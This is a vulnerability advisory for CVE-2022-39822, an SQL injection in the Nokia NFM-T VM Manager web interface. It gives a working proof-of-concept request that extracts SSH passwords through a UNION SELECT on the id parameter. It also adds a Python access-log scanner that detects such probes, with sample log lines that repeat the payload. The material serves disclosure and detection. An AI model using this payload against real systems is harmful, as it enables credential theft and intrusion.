CVE-2022-39822 – NOKIA NFM-T VM Manager WebUI

Vulnerability Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') – CWE-89

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39822

CVSSv3: 8.8

Severity: High

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The Web Application is affected by an SQL Injection vulnerability. Through the injection of arbitrary SQL statements, a potential attacker can modify the query syntax and perform unauthorized (and unexpected) operations against the remote database.


Step-by-step instructions and PoC

A remote user authenticated to the web application can manipulate the request parameters and use the database's error output to read and alter its data. The injection forces the database to generate an error that reveals its structure to the actor, who then extracts the contents returned by the manipulated database statement. See the examples below for step-by-step instructions to reproduce the vulnerability.

Affected Endpoints


- URL: https://<host>/cgi-bin/R19.9/easy1350.pl?action=edit_master&session=[REDACTED]&id=1&host=1

- HTTP Parameter: id, host


Below is the evidence, with the vulnerability details and the payload used.


GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=KALEVO19&id=1'+union+SELECT+group_concat(ssh_password,'~~')+FROM+hosts+--&host=1 HTTP/1.1

Host: <host>

Cookie: XSRF=[REDACTED]

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Authorization: Basic [REDACTED]

Connection: close


The first step consists of changing the value of the parameter to obtain an SQL error.

The attacker can then manipulate the parameter passed to the function to discover user names, data from other tables, or eventually guess the database hostname. In more detail, it was possible to extract the SSH password of the root user.
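As an added defensive example (not part of the TIM advisory and not code from the Nokia product), the following Python scans web-server access-log lines for the two-stage pattern described above: a quote injected into the id parameter that triggers a server error, followed by a UNION SELECT payload. The log lines, IP addresses and session value are constructed samples.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not taken from the advisory). Line 1 is a
# benign request, line 2 is a quote probe that caused a 500, line 3 carries a
# UNION SELECT payload of the shape shown in the advisory's request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2022:10:00:01 +0000] "GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=X&id=1&host=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Oct/2022:10:00:02 +0000] "GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=X&id=1%27&host=1 HTTP/1.1" 500 88
10.0.0.9 - - [01/Oct/2022:10:00:03 +0000] "GET /cgi-bin/R19.9/easy1350.pl?action=edit_master&session=X&id=1%27+union+SELECT+group_concat(ssh_password,%27~~%27)+FROM+hosts+--&host=1 HTTP/1.1" 200 740
"""

# Request line and status code of a Common Log Format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Decoded parameter values that look like SQL syntax spliced after a quote,
# UNION SELECT chaining, or an SQL comment used to discard the query tail.
SQLI_RE = re.compile(
    r"'\s*((union|select|or|and)\b|;|--)"
    r"|\bunion\b\s+(all\s+)?\bselect\b"
    r"|--\s*$|/\*",
    re.IGNORECASE,
)


def scan_line(line):
    """Return (parameter, reason) findings for one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return []
    status = int(m.group("status"))
    findings = []
    # parse_qsl decodes both %27 and '+' so the check sees the raw SQL.
    for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        if SQLI_RE.search(value):
            findings.append((name, "sqli-pattern"))
        elif "'" in value and status >= 500:
            # A lone quote that produced a server error: the error-based
            # reconnaissance step the advisory describes.
            findings.append((name, "quote-probe-with-server-error"))
    return findings


def scan_log(text):
    """Scan a whole log, returning one dict per finding with its line number."""
    report = []
    for n, line in enumerate(text.splitlines(), 1):
        for name, reason in scan_line(line):
            report.append({"line": n, "param": name, "reason": reason})
    return report


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```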


Security Impact


Malicious users can access the data processed by the database and potentially conduct further attacks against the database, other users of the portal and the server machine itself.